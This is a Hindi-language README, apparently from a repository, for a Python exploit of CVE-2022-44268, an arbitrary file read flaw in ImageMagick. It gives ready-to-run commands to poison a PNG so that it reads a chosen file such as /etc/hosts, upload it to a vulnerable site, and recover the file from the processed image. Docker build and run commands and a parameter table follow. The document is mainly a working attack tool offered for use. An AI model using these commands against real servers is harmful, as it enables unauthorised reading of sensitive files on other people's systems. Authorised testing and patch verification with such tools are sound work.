
CVE-2022-44268 के लिए Python-आधारित एक्सप्लॉइट, ImageMagick में एक मनमानी फ़ाइल पढ़ने की कमजोरी। संवेदनशील फ़ाइलों को पढ़ने के लिए वेब अपलोड के माध्यम से कमजोर होस्ट से PNG इमेज को जहर देता है।
CVE-2022-44268 ImageMagick मनमानी फ़ाइल पढ़ना
इमेज को जहर दें ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
जहरीली PNG इमेज अपलोड करें।
जांचें कि एक्सप्लॉइट सफल था या नहीं 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
बनाएं
docker build -t cve-2022-44268 .
चलाएं
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Parameter | Description | Type |
|---|---|---|
| --url | अपलोड की गई PNG इमेज का URL | String |
| --image | इनपुट PNG फ़ाइल | File |
| --output | आउटपुट PNG फ़ाइल | File |
| --file-to-read | असुरक्षित होस्ट से पढ़ने के लिए फ़ाइल | String |